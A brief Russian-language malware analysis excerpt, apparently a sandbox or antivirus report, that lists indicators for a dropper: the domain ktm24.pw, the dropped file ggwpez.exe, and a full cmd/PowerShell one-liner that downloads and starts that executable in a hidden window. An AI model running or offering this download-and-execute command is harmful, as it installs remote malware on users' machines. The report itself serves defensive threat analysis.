Техническая информация
- http://ktm24.pw/ttpot.exe как %temp%\ggwpez.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://ktm24.pw/ttpot.exe','%TEMP%\ggwpez.exe');Start-Process '%TEMP%\ggwpez.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1472
- %TEMP%\1254809.cvr
- DNS ASK kt##4.pw
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://ktm24.pw/ttpot.exe','%TEMP%\ggwpez.exe');Start-Process '%TEMP%\ggwpez.exe'; (со скрытым окном)